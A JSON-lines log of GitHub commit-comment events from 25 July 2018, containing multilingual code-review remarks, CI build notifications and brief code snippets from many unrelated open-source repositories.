{"id":"8018074776","type":"CommitCommentEvent","actor":{"login":"boogheta"},"repo":{"name":"regardscitoyens/the-law-factory"},"payload":{"comment":{"id":29832803,"position":5,"line":394,"path":"public/modules/navettes/navettes.viz.js","commit_id":"a176ae1a3784cc7ae8feb07db2a9558bcb17f8f5","created_at":"2018-07-25T17:55:29Z","updated_at":"2018-07-25T17:55:29Z","author_association":"CONTRIBUTOR","body":"il faudrait le mettre aussi dans le if sinon c jamais atteint non?"}},"created_at":"2018-07-25T17:55:29Z"}
{"id":"8018074869","type":"CommitCommentEvent","actor":{"login":"martincarrera"},"repo":{"name":"ebaynaud/react-navigation"},"payload":{"comment":{"id":29832805,"position":null,"line":null,"path":null,"commit_id":"ddcce38fa23b2c4662b71401f796f1415b450308","created_at":"2018-07-25T17:55:30Z","updated_at":"2018-07-25T17:55:30Z","author_association":"NONE","body":"Hi @ebaynaud! I just tried this and it works great with the latest versions of React Native.\r\n\r\nAre you thinking of submitting a Pull Request to the main library? It would be awesome.\r\n\r\nThanks in advance!"}},"created_at":"2018-07-25T17:55:30Z"}
{"id":"8018074881","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"goodkov/Stockfish"},"payload":{"comment":{"id":29832806,"position":null,"line":null,"path":null,"commit_id":"0ddbc4d66676c156c9c489e949e5008182c10f50","created_at":"2018-07-25T17:55:30Z","updated_at":"2018-07-25T17:55:30Z","author_association":"NONE","body":"With this definition safeChecks are overscored\r\n\r\nExample: Qh1, Rh2 against Kg8, not only a RookSafeCheck is recorded, as master, \r\nbut also a QueenSafeCheck.\r\n\r\nAlso, Queen mobility is overscored, and other side effects (maybe good, may be bad) in CloseEnemies, kingAttackersCount and so on.\r\n    \r\n "}},"created_at":"2018-07-25T17:55:30Z"}
{"id":"8018074938","type":"CommitCommentEvent","actor":{"login":"Pikachu920"},"repo":{"name":"SkriptLang/Skript"},"payload":{"comment":{"id":29832807,"position":44,"line":68,"path":"src/main/java/ch/njol/skript/lang/SyntaxElementInfo.java","commit_id":"b5e4385259e76245a0e5e913aadf7d41122612fc","created_at":"2018-07-25T17:55:31Z","updated_at":"2018-07-25T17:55:31Z","author_association":"MEMBER","body":"yes, thanks"}},"created_at":"2018-07-25T17:55:31Z"}
{"id":"8018076338","type":"CommitCommentEvent","actor":{"login":"mp3butcher"},"repo":{"name":"mp3butcher/OpenSceneGraph"},"payload":{"comment":{"id":29832812,"position":null,"line":null,"path":null,"commit_id":"86bd4a4e8b642deceb6d03757ea2e815f36ccaa9","created_at":"2018-07-25T17:55:47Z","updated_at":"2018-07-25T17:55:47Z","author_association":"OWNER","body":"@openscenegraph \r\nAll these files changes is weird.I hope the merging happen correctly\r\n(It was an old branch i haven't pr several month ago -can't rememeber why- and i haven't merge with master before re-pr)\r\n"}},"created_at":"2018-07-25T17:55:47Z"}
{"id":"8018084772","type":"CommitCommentEvent","actor":{"login":"ronnix"},"repo":{"name":"betagouv/zam"},"payload":{"comment":{"id":29832826,"position":null,"line":null,"path":null,"commit_id":"dd545cced1759812c1b79dc21ecb81bc2650ce21","created_at":"2018-07-25T17:57:24Z","updated_at":"2018-07-25T17:57:24Z","author_association":"COLLABORATOR","body":"Explicit is better than implicit. But less is more. OK! 🙂"}},"created_at":"2018-07-25T17:57:24Z"}
{"id":"8018090678","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29832840,"position":72,"line":72,"path":"device/sensor/drv/drv_co2_sensirion_scd30.c","commit_id":"833c7ac86b6fe1b8c11d9c29e1150b9cee9415cf","created_at":"2018-07-25T17:58:29Z","updated_at":"2018-07-25T17:58:29Z","author_association":"NONE","body":"fine if potentially unaligned 32bit access is allowable since data is potentially only byte aligned - some architectures (m0 I think) crash at runtime. Also assumes a big-endian arch, I suppose that's a fact."}},"created_at":"2018-07-25T17:58:29Z"}
{"id":"8018091132","type":"CommitCommentEvent","actor":{"login":"jeoliva222"},"repo":{"name":"jeoliva222/DND-Game"},"payload":{"comment":{"id":29832841,"position":null,"line":null,"path":null,"commit_id":"1995b28113597747d81619fde08e8695b72cf0db","created_at":"2018-07-25T17:58:33Z","updated_at":"2018-07-25T17:58:33Z","author_association":"OWNER","body":"Should have fixed the 'Unknown author' bug. Next commit should properly display the correct author."}},"created_at":"2018-07-25T17:58:33Z"}
{"id":"8018095265","type":"CommitCommentEvent","actor":{"login":"the-j0k3r"},"repo":{"name":"StylishThemes/GitHub-Dark"},"payload":{"comment":{"id":29832854,"position":null,"line":null,"path":null,"commit_id":"ea6b1ac441bdcac020ed8c387a826aa6234a9779","created_at":"2018-07-25T17:59:22Z","updated_at":"2018-07-25T17:59:22Z","author_association":"MEMBER","body":"@silverwind @Mottie I think we can ever remove ,\r\n  .`discussion-item-review.is-pending .file-header` after messing around somemore this doesn't make any difference I can see by removing.\r\n"}},"created_at":"2018-07-25T17:59:22Z"}
{"id":"8018097701","type":"CommitCommentEvent","actor":{"login":"Benau"},"repo":{"name":"supertuxkart/stk-code"},"payload":{"comment":{"id":29832859,"position":null,"line":null,"path":null,"commit_id":"c69bf2b96f244e8b34cc7deaf0217f568ddc9dc2","created_at":"2018-07-25T17:59:51Z","updated_at":"2018-07-25T17:59:51Z","author_association":"MEMBER","body":"all stk fans update server!"}},"created_at":"2018-07-25T17:59:51Z"}
{"id":"8018098788","type":"CommitCommentEvent","actor":{"login":"Nitimar"},"repo":{"name":"spesmilo/electrum"},"payload":{"comment":{"id":29832861,"position":null,"line":null,"path":null,"commit_id":"8f17f38b02406ff4f90940ea66dda4b5f93bf227","created_at":"2018-07-25T18:00:04Z","updated_at":"2018-07-25T18:00:04Z","author_association":"NONE","body":"self.print_error(msg)\r\n-            handler.show_error(msg)\r\n+            if handler:\r\n+                handler.show_error(msg)\r\n+            else:\r\n+                raise Exception(msg)"}},"created_at":"2018-07-25T18:00:04Z"}
{"id":"8018099279","type":"CommitCommentEvent","actor":{"login":"denniedegroot"},"repo":{"name":"denniedegroot/com.ring"},"payload":{"comment":{"id":29832864,"position":null,"line":null,"path":null,"commit_id":"a79d6175a0c3109c0b519bd45a6eae3326952a1c","created_at":"2018-07-25T18:00:10Z","updated_at":"2018-07-25T18:00:10Z","author_association":"OWNER","body":"Solves #4 "}},"created_at":"2018-07-25T18:00:10Z"}
{"id":"8018100534","type":"CommitCommentEvent","actor":{"login":"AmauriC"},"repo":{"name":"AmauriC/tarteaucitron.js"},"payload":{"comment":{"id":29832875,"position":null,"line":null,"path":null,"commit_id":"5956fcbbec482c1a2d2b76d57a600e5e1c26609d","created_at":"2018-07-25T18:00:22Z","updated_at":"2018-07-25T18:00:22Z","author_association":"OWNER","body":"Thanks 👍 \r\n249a00d"}},"created_at":"2018-07-25T18:00:22Z"}
{"id":"8018105292","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29832882,"position":null,"line":null,"path":null,"commit_id":"4fc4ecb066da5dcdf7976409b1e4cdca18ca1e4c","created_at":"2018-07-25T18:01:14Z","updated_at":"2018-07-25T18:01:14Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#pr-154](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#pr-154).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-154-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-25T18:01:14Z"}
{"id":"8018105425","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29832883,"position":5,"line":9,"path":"1/right_triangle.rb","commit_id":"dc24017eacdc325bbb6e2180d4c02a3fae8decd3","created_at":"2018-07-25T18:01:16Z","updated_at":"2018-07-25T18:01:16Z","author_association":"NONE","body":"Еще бы хорошо вывести сообщение, что треугольник равносторонний, прежде, чем молча выходить."}},"created_at":"2018-07-25T18:01:16Z"}
{"id":"8018111402","type":"CommitCommentEvent","actor":{"login":"espoelstra"},"repo":{"name":"sandeep1995/git-extra-status"},"payload":{"comment":{"id":29832886,"position":null,"line":null,"path":null,"commit_id":"6f61b6aa4a78ee4183ee07e69bc6fbd143e3f4a5","created_at":"2018-07-25T18:02:26Z","updated_at":"2018-07-25T18:02:26Z","author_association":"CONTRIBUTOR","body":"@sandeep1995 Are you going to add new code address the Detached head state differently?"}},"created_at":"2018-07-25T18:02:26Z"}
{"id":"8018116389","type":"CommitCommentEvent","actor":{"login":"jayands"},"repo":{"name":"themasch/node-ebml"},"payload":{"comment":{"id":29832893,"position":226,"line":126,"path":"lib/ebml/encoder.js","commit_id":"79477d27f0edb69d3ff480209a4eaa7c7b561fcf","created_at":"2018-07-25T18:03:24Z","updated_at":"2018-07-25T18:03:24Z","author_association":"NONE","body":"```js\r\nconst childTagDataBuffers = tag.children.map(({ data }) => data);\r\n// the above line is equivalent to that anonymous function,\r\n// thanks to destructuring and arrow functions\r\n```"}},"created_at":"2018-07-25T18:03:24Z"}
{"id":"8018116429","type":"CommitCommentEvent","actor":{"login":"mikemmz"},"repo":{"name":"mikemmz/jcopy"},"payload":{"comment":{"id":29832894,"position":null,"line":null,"path":null,"commit_id":"5468619eff162faa570ae7b12f0f52f6d621cd55","created_at":"2018-07-25T18:03:25Z","updated_at":"2018-07-25T18:03:25Z","author_association":"OWNER","body":"+# jcopy\r\n+ให้เขียนโปรแกรม JCopy ที่รับ Command Line Argument 2 ตัวคือ ไฟล์ต้นฉบับ และ ไฟล์ที่จะ copy ดังนี้คือ java JCopy "}},"created_at":"2018-07-25T18:03:25Z"}
{"id":"8018119260","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"pisarekpiotr/secondrepo"},"payload":{"comment":{"id":29832902,"position":28,"line":15,"path":"kodilla-stream/src/main/java/com/kodilla/stream/StreamMain.java","commit_id":"d8a0d17fa408ebe85d412b8c0d38ca69b1548f6f","created_at":"2018-07-25T18:03:59Z","updated_at":"2018-07-25T18:03:59Z","author_association":"NONE","body":"Kod zadziała nieprawidłowo jeśli zmieni się data (będzie np rok 2019). Spróbuj użyć np ChronoUnit.DAYS i odpowiedniej metody"}},"created_at":"2018-07-25T18:03:59Z"}
{"id":"8018124006","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29832917,"position":17,"line":22,"path":"1/right_triangle.rb","commit_id":"dc24017eacdc325bbb6e2180d4c02a3fae8decd3","created_at":"2018-07-25T18:04:50Z","updated_at":"2018-07-25T18:04:50Z","author_association":"NONE","body":"Нет, нам не нужно 2 отдельных if стэйтмэнта. Сейчас получится, что выведется сообщение из обоих. Тут нужно использовать elsif, что-б объединить условия. Если треугольник прямоугольный и равнобедренный - выводим одно сообщение, если только прямоугольный - другое."}},"created_at":"2018-07-25T18:04:50Z"}
{"id":"8018124263","type":"CommitCommentEvent","actor":{"login":"meleg"},"repo":{"name":"nep-pack/NonlinearEigenproblems.jl"},"payload":{"comment":{"id":29832918,"position":null,"line":null,"path":null,"commit_id":"59b2c1285d08c953525418fd986ed6e40c415598","created_at":"2018-07-25T18:04:53Z","updated_at":"2018-07-25T18:04:53Z","author_association":"CONTRIBUTOR","body":"I have noticed that there are a lot of conversion between types in the Newton functions. For example in `augnewton`  we have commands like `tempvec = Array{T,1}(lin_solve(linsolver, z, tol=tol));` that are enforcing the type. Clearly we have error if we want to convert Complex numbers to Float numbers. However I think that this is not the way we enforce a type. If we have v=f(w) and we want v to be Float then we should be sure that f gives a Float as output and not convert f(w) to a Float. Maybe I did not understand well the functions, so correct me if I am wrong.\r\n "}},"created_at":"2018-07-25T18:04:53Z"}
{"id":"8018125322","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29832923,"position":null,"line":null,"path":null,"commit_id":"be305194957faff6e2a2428ed7444c8fa26bf50b","created_at":"2018-07-25T18:05:06Z","updated_at":"2018-07-25T18:05:06Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/be305194957faff6e2a2428ed7444c8fa26bf50b/index.html"}},"created_at":"2018-07-25T18:05:06Z"}
{"id":"8018130291","type":"CommitCommentEvent","actor":{"login":"strizhechenko"},"repo":{"name":"strizhechenko/strizhechenko.github.io"},"payload":{"comment":{"id":29832932,"position":13,"line":13,"path":"_posts/2018-07-25-development_and_developers.markdown","commit_id":"1dc9194d02c83f212bd17dfcf5571b8221847c75","created_at":"2018-07-25T18:06:02Z","updated_at":"2018-07-25T18:06:02Z","author_association":"OWNER","body":"Спасибо!"}},"created_at":"2018-07-25T18:06:02Z"}
{"id":"8018131658","type":"CommitCommentEvent","actor":{"login":"plusvic"},"repo":{"name":"VirusTotal/yara-python"},"payload":{"comment":{"id":29832938,"position":5,"line":600,"path":"yara-python.c","commit_id":"367290a586ef7b7f83e5db265bfe39b57847473e","created_at":"2018-07-25T18:06:18Z","updated_at":"2018-07-25T18:06:18Z","author_association":"COLLABORATOR","body":"I think this `if` is redundant and can be removed altogether."}},"created_at":"2018-07-25T18:06:18Z"}
{"id":"8018136580","type":"CommitCommentEvent","actor":{"login":"fish2000"},"repo":{"name":"fish2000/halogen"},"payload":{"comment":{"id":29832944,"position":null,"line":null,"path":null,"commit_id":"bc62cadebc4a467c6424f84b41116a41462864e2","created_at":"2018-07-25T18:07:16Z","updated_at":"2018-07-25T18:07:16Z","author_association":"OWNER","body":"![screen shot 2018-07-25 at 2 04 06 pm](https://user-images.githubusercontent.com/378969/43218872-b491fa7c-9013-11e8-9e14-287e6c092768.jpg)\r\n\r\n_Figure 1 (above): one of the more coherent and less completely blatheriffic Cython compiler “error messages” (q.v. commit note supra.) preserved here for posterity_"}},"created_at":"2018-07-25T18:07:16Z"}
{"id":"8018136659","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/saymore"},"payload":{"comment":{"id":29832945,"position":null,"line":null,"path":null,"commit_id":"d5ad43c529d47bde8591807515d8ecf49a5d4ce6","created_at":"2018-07-25T18:07:17Z","updated_at":"2018-07-25T18:07:17Z","author_association":"NONE","body":"TeamCity SayMore :: SayMore pull requests [Build *.*.206.d5ad43c529d47bde8591807515d8ecf49a5d4ce6](http://build.palaso.org/viewLog.html?buildId=125609&buildTypeId=SayMore_SayMorePullRequests) outcome was **FAILURE**\nSummary: Exit code 1 Build time: 00:00:15"}},"created_at":"2018-07-25T18:07:17Z"}
{"id":"8018136813","type":"CommitCommentEvent","actor":{"login":"ImreSamu"},"repo":{"name":"KAMI911/osm_poi_matchmaker"},"payload":{"comment":{"id":29832947,"position":null,"line":null,"path":null,"commit_id":"9af6d17b3766a72826cf743e2d32407f9a597fbc","created_at":"2018-07-25T18:07:19Z","updated_at":"2018-07-25T18:07:19Z","author_association":"NONE","body":"Ezeknek changset - tag-ek lesznek ?\r\n\r\npl. ide kerülnek be?  https://www.openstreetmap.org/api/0.6/changeset/60929797\r\n"}},"created_at":"2018-07-25T18:07:19Z"}
{"id":"8018139062","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29832951,"position":17,"line":22,"path":"1/right_triangle.rb","commit_id":"dc24017eacdc325bbb6e2180d4c02a3fae8decd3","created_at":"2018-07-25T18:07:47Z","updated_at":"2018-07-25T18:07:47Z","author_association":"NONE","body":"Еще порекомендую, что-б 2 раза не вычислять Пифагора, вычислить его 1 раз и записать в переменную, которая будет возвращать true/false. Назвать переменную можно rectangular например. И подставлять результаты вычислений  в условия тут. Опять-же в случае более сложных вычислений, это сэкономит ресурсы и упростит понимание if/elsif/else выражения. "}},"created_at":"2018-07-25T18:07:47Z"}
{"id":"8018141559","type":"CommitCommentEvent","actor":{"login":"jdschwam"},"repo":{"name":"jdschwam/bahsld8"},"payload":{"comment":{"id":29832960,"position":null,"line":null,"path":null,"commit_id":"b17c8f2c4e03a61977c854742bc7ec7ed131d206","created_at":"2018-07-25T18:08:16Z","updated_at":"2018-07-25T18:08:16Z","author_association":"OWNER","body":"Created multidev environment [bahsld8#ci-2](https://dashboard.pantheon.io/sites/599fee42-0ab6-40f5-8e6a-d2cdbda4ae8e#ci-2).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-2-bahsld8.pantheonsite.io/)"}},"created_at":"2018-07-25T18:08:16Z"}
{"id":"8018142971","type":"CommitCommentEvent","actor":{"login":"dustinsoftware"},"repo":{"name":"Faithlife/styled-ui"},"payload":{"comment":{"id":29832963,"position":null,"line":null,"path":null,"commit_id":"5c07f519b8053bb698a5c747f748875fdc87c422","created_at":"2018-07-25T18:08:32Z","updated_at":"2018-07-25T18:08:32Z","author_association":"COLLABORATOR","body":"Ugh.. meant to type \"dev dependency\""}},"created_at":"2018-07-25T18:08:32Z"}
{"id":"8018143158","type":"CommitCommentEvent","actor":{"login":"VladFiliucov"},"repo":{"name":"metaphorizer/lessons"},"payload":{"comment":{"id":29832964,"position":17,"line":22,"path":"1/right_triangle.rb","commit_id":"dc24017eacdc325bbb6e2180d4c02a3fae8decd3","created_at":"2018-07-25T18:08:35Z","updated_at":"2018-07-25T18:08:35Z","author_association":"NONE","body":"И еще сравнивать с гипотинузой в проверке на равнобедренность нет смысла - она всегда будет длинней."}},"created_at":"2018-07-25T18:08:35Z"}
{"id":"8018143212","type":"CommitCommentEvent","actor":{"login":"ransom1538"},"repo":{"name":"hparcells/ShapeMath"},"payload":{"comment":{"id":29832965,"position":null,"line":null,"path":null,"commit_id":"6cea46a788647cbedfb651808783861087290815","created_at":"2018-07-25T18:08:35Z","updated_at":"2018-07-25T18:08:35Z","author_association":"NONE","body":"Sigh. Ok you are banned from gitstarred. "}},"created_at":"2018-07-25T18:08:35Z"}
{"id":"8018143803","type":"CommitCommentEvent","actor":{"login":"leaherb"},"repo":{"name":"leaherb/intro-to-pandas"},"payload":{"comment":{"id":29832966,"position":null,"line":null,"path":null,"commit_id":"72bffd92106374debd4618d4002ee75050aeb674","created_at":"2018-07-25T18:08:42Z","updated_at":"2018-07-25T18:08:42Z","author_association":"OWNER","body":"UFO Sightings data"}},"created_at":"2018-07-25T18:08:42Z"}
{"id":"8018143966","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"NixOS/nixpkgs"},"payload":{"comment":{"id":29832967,"position":null,"line":null,"path":null,"commit_id":"310cb761359b16ad2ec72662a0b703dbb816a379","created_at":"2018-07-25T18:08:44Z","updated_at":"2018-07-25T18:08:44Z","author_association":"CONTRIBUTOR","body":"> Short answer is it's WIP and not usee by default until I sort those things out. This is probably no harder to maintain than the mess we have already!\r\n\r\nWhy? What are the actual problems we currently have?\r\n\r\n> https://github.com/richfelker/musl-cross-make does do this this way, as does exherbo https://git.exherbo.org/summer/packages/sys-libs/libgcc/index.html\r\n\r\nI don't see musl-cross-make doing any of this stuff? E.g. `git grep libgcc.mvars` returns no results.\r\n\r\nAs for what it comes to exherbo, it seems to be a quite small project. Yocto, Buildroot and OpenWRT all are more popular, are actually used in production, support way more architectures etc. I like Buildroot the most, their code is generally really, really simple and all in one repository. Yocto is a huge complicated beast. I haven't looked into OpenWRT yet."}},"created_at":"2018-07-25T18:08:44Z"}
{"id":"8018144809","type":"CommitCommentEvent","actor":{"login":"KellanHiggins"},"repo":{"name":"btunnadine/UnityFBXExporter"},"payload":{"comment":{"id":29832970,"position":null,"line":null,"path":null,"commit_id":"d8c2c27172bf26d27fda70565071f44981a56e84","created_at":"2018-07-25T18:08:53Z","updated_at":"2018-07-25T18:08:53Z","author_association":"NONE","body":"I think I'll have to come back to this when I need to update this project again. I can't remember how any of this stuff works :P. I will leave this open and maybe one day pull it in or do a dirty copy.\r\n\r\nWith Unity's implementation of the FBX exporter, this project may be going the way of the dodo anyways."}},"created_at":"2018-07-25T18:08:53Z"}
{"id":"8018144897","type":"CommitCommentEvent","actor":{"login":"pedrorozoc"},"repo":{"name":"wso2/carbon-apimgt"},"payload":{"comment":{"id":29832971,"position":5,"line":124,"path":"components/apimgt/org.wso2.carbon.apimgt.impl/src/main/java/org/wso2/carbon/apimgt/impl/definitions/APIDefinitionFromOpenAPISpec.java","commit_id":"5976e548c665fb058989109e37e48202a2210c19","created_at":"2018-07-25T18:08:55Z","updated_at":"2018-07-25T18:08:55Z","author_association":"NONE","body":"I'm using API Manager v 2.5.0, when I import the swagger definition file and and try to save, I get this error:\r\n\"The HTTP method 'parameters' provided for resource '/tasks/{taskid}' is invalid\"\r\n```\r\n at org.wso2.carbon.apimgt.impl.utils.APIUtil.handleException(APIUtil.java:1411)\r\n        at org.wso2.carbon.apimgt.impl.definitions.APIDefinitionFromOpenAPISpec.getURITemplates(APIDefinitionFromOpenAPISpec.java:124)\r\n        at org.wso2.carbon.apimgt.hostobjects.APIProviderHostObject.jsFunction_updateAPIDesign(APIProviderHostObject.java:969)\r\n        at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)\r\n        at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)\r\n        at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)\r\n        at java.lang.reflect.Method.invoke(Method.java:498)\r\n        at org.mozilla.javascript.MemberBox.invoke(MemberBox.java:126)\r\n        ... 69 more\r\n```\r\nPlease check the Swagger spec https://swagger.io/specification/#pathItemObject\r\n\r\nIn previous versions this 'else' did not exist.\r\n\r\n"}},"created_at":"2018-07-25T18:08:55Z"}
{"id":"8018145317","type":"CommitCommentEvent","actor":{"login":"AustinWhaley"},"repo":{"name":"AustinWhaley/VIM"},"payload":{"comment":{"id":29832976,"position":null,"line":null,"path":null,"commit_id":"58e460b990091de52c98b610aefbe33a7a30d551","created_at":"2018-07-25T18:09:00Z","updated_at":"2018-07-25T18:09:00Z","author_association":"OWNER","body":"Added new key bindings:\r\n- Tab: enabled in normal mode\r\n- Shift+Tab: Deletes four spaces behind cursor in normal and insert modes\r\n- F3: Pastes current time, start of header and auto last save function for header\r\n- F8/F9: Moved no spell and spell check since F7 is Flake8()\r\nAdded new command:\r\n- EditVim: Opens new buffer with _vimrc and moves to the new buffer\r\nRemoved ALE:\r\n- Flake8 does everything I need, trim excess"}},"created_at":"2018-07-25T18:09:00Z"}
{"id":"8018146982","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/saymore"},"payload":{"comment":{"id":29832979,"position":null,"line":null,"path":null,"commit_id":"d5ad43c529d47bde8591807515d8ecf49a5d4ce6","created_at":"2018-07-25T18:09:19Z","updated_at":"2018-07-25T18:09:19Z","author_association":"NONE","body":"TeamCity SayMore :: SayMore pull requests [Build *.*.207.d5ad43c529d47bde8591807515d8ecf49a5d4ce6](http://build.palaso.org/viewLog.html?buildId=125610&buildTypeId=SayMore_SayMorePullRequests) outcome was **SUCCESS**\nSummary: Tests passed: 684, ignored: 4 Build time: 00:00:57"}},"created_at":"2018-07-25T18:09:19Z"}
{"id":"8018148562","type":"CommitCommentEvent","actor":{"login":"Emrran"},"repo":{"name":"CSE327/blood-donation-website"},"payload":{"comment":{"id":29832980,"position":null,"line":null,"path":null,"commit_id":"b395d9428e0e9ef6952f3e3a43ae385ae9f2cb0a","created_at":"2018-07-25T18:09:39Z","updated_at":"2018-07-25T18:09:39Z","author_association":"CONTRIBUTOR","body":"imran"}},"created_at":"2018-07-25T18:09:39Z"}
{"id":"8018149472","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/AliOS-Things"},"payload":{"comment":{"id":29832981,"position":126,"line":126,"path":"device/sensor/drv/drv_co2_sensirion_scd30.c","commit_id":"833c7ac86b6fe1b8c11d9c29e1150b9cee9415cf","created_at":"2018-07-25T18:09:50Z","updated_at":"2018-07-25T18:09:50Z","author_association":"NONE","body":"blank line?"}},"created_at":"2018-07-25T18:09:50Z"}
{"id":"8018152857","type":"CommitCommentEvent","actor":{"login":"palaso-bob"},"repo":{"name":"sillsdev/saymore"},"payload":{"comment":{"id":29832989,"position":null,"line":null,"path":null,"commit_id":"c1d9acc1f27607c9887da1dccbb1a645e42a9d5c","created_at":"2018-07-25T18:10:30Z","updated_at":"2018-07-25T18:10:30Z","author_association":"NONE","body":"TeamCity SayMore :: SayMore pull requests [Build *.*.208.c1d9acc1f27607c9887da1dccbb1a645e42a9d5c](http://build.palaso.org/viewLog.html?buildId=125611&buildTypeId=SayMore_SayMorePullRequests) outcome was **FAILURE**\nSummary: Compilation error: src\\SayMore\\SayMore.csproj (new) Build time: 00:00:21"}},"created_at":"2018-07-25T18:10:30Z"}
{"id":"8018154548","type":"CommitCommentEvent","actor":{"login":"sdrausty"},"repo":{"name":"sdrausty/TermuxArch"},"payload":{"comment":{"id":29832994,"position":null,"line":null,"path":null,"commit_id":"6c9c119c00c5601bd37c07a2e231c305d4966168","created_at":"2018-07-25T18:10:51Z","updated_at":"2018-07-25T18:10:51Z","author_association":"OWNER","body":"@abicorios\r\n```\r\nelse\r\n\t\tprintf \"./root/bin/keys\\n\" >> root/bin/$binfnstp\r\nfi\r\n```\r\nelse=\"everything else (including aarch64)\""}},"created_at":"2018-07-25T18:10:51Z"}
{"id":"8018154558","type":"CommitCommentEvent","actor":{"login":"uhq1"},"repo":{"name":"icaoberg/cbd-directory"},"payload":{"comment":{"id":29832995,"position":null,"line":null,"path":null,"commit_id":"195c23dc319c746cd1c991e0d6a9711cb6953e46","created_at":"2018-07-25T18:10:51Z","updated_at":"2018-07-25T18:10:51Z","author_association":"COLLABORATOR","body":"Fixes #17 and #18 "}},"created_at":"2018-07-25T18:10:51Z"}
{"id":"8018157807","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Djuliuss/RockPaperScissors"},"payload":{"comment":{"id":29833003,"position":114,"line":103,"path":"contracts/RockPaperScissors.sol","commit_id":"70845492a821aac28b876a273b950da611307999","created_at":"2018-07-25T18:11:29Z","updated_at":"2018-07-25T18:11:29Z","author_association":"NONE","body":"Not sure what happens if one player fails to reveal."}},"created_at":"2018-07-25T18:11:29Z"}
{"id":"8018159128","type":"CommitCommentEvent","actor":{"login":"ksatchit"},"repo":{"name":"openebs/openebs"},"payload":{"comment":{"id":29833007,"position":4,"line":3,"path":"e2e/ansible/playbooks/resiliency/test-k8s-master-failure/k8s-master-failure-vars.yml","commit_id":"9f396a68acec9f34439212c9b771819ac8910ee0","created_at":"2018-07-25T18:11:37Z","updated_at":"2018-07-25T18:11:37Z","author_association":"MEMBER","body":"?? "}},"created_at":"2018-07-25T18:11:37Z"}
{"id":"8018162674","type":"CommitCommentEvent","actor":{"login":"jayands"},"repo":{"name":"themasch/node-ebml"},"payload":{"comment":{"id":29833013,"position":43,"line":30,"path":"lib/ebml/tools.js","commit_id":"79477d27f0edb69d3ff480209a4eaa7c7b561fcf","created_at":"2018-07-25T18:12:15Z","updated_at":"2018-07-25T18:12:15Z","author_association":"NONE","body":"Either declare these as constants or rid the magic numbers.\r\n\r\n```js\r\n//  const BYTE_DEPTH = 8;\r\n// const MAGIC_SEVEN = 7;\r\nif (value >= (2 **(53 - BYTE_DEPTH)) && buffer[start + MAGIC_SEVEN] > 0) {\r\n// the parens around the exponeentiation statement are technically not required, but they make me feel safer"}},"created_at":"2018-07-25T18:12:15Z"}
{"id":"8018163628","type":"CommitCommentEvent","actor":{"login":"ksatchit"},"repo":{"name":"openebs/openebs"},"payload":{"comment":{"id":29833017,"position":5,"line":47,"path":"e2e/ansible/playbooks/resiliency/test-k8s-master-failure/k8s-master-failure.yml","commit_id":"9f396a68acec9f34439212c9b771819ac8910ee0","created_at":"2018-07-25T18:12:25Z","updated_at":"2018-07-25T18:12:25Z","author_association":"MEMBER","body":"Is the source step not needed anymore ? "}},"created_at":"2018-07-25T18:12:25Z"}
{"id":"8018165873","type":"CommitCommentEvent","actor":{"login":"jayands"},"repo":{"name":"themasch/node-ebml"},"payload":{"comment":{"id":29833020,"position":48,"line":37,"path":"lib/ebml/tools.js","commit_id":"79477d27f0edb69d3ff480209a4eaa7c7b561fcf","created_at":"2018-07-25T18:12:52Z","updated_at":"2018-07-25T18:12:52Z","author_association":"NONE","body":"`value *= 2 ** 8`"}},"created_at":"2018-07-25T18:12:52Z"}
{"id":"8018167196","type":"CommitCommentEvent","actor":{"login":"grdnrio"},"repo":{"name":"fmrtl73/vagrant"},"payload":{"comment":{"id":29833022,"position":45,"line":200,"path":"k8s/Vagrantfile","commit_id":"6df04be469366984a44cc9ebf812f74ffe69a97e","created_at":"2018-07-25T18:13:09Z","updated_at":"2018-07-25T18:13:09Z","author_association":"COLLABORATOR","body":"This change is currently breaking my deployment with the following error:\r\n\r\n```\r\nVagrant:\r\n* Unknown configuration section 'disksize'.\r\n\r\nThere are errors in the configuration of this machine. Please fix\r\nthe following errors and try again:\r\n\r\nVagrant:\r\n* Unknown configuration section 'disksize'.\r\n```\r\n\r\n@fmrtl73 can you check and confirm?"}},"created_at":"2018-07-25T18:13:09Z"}
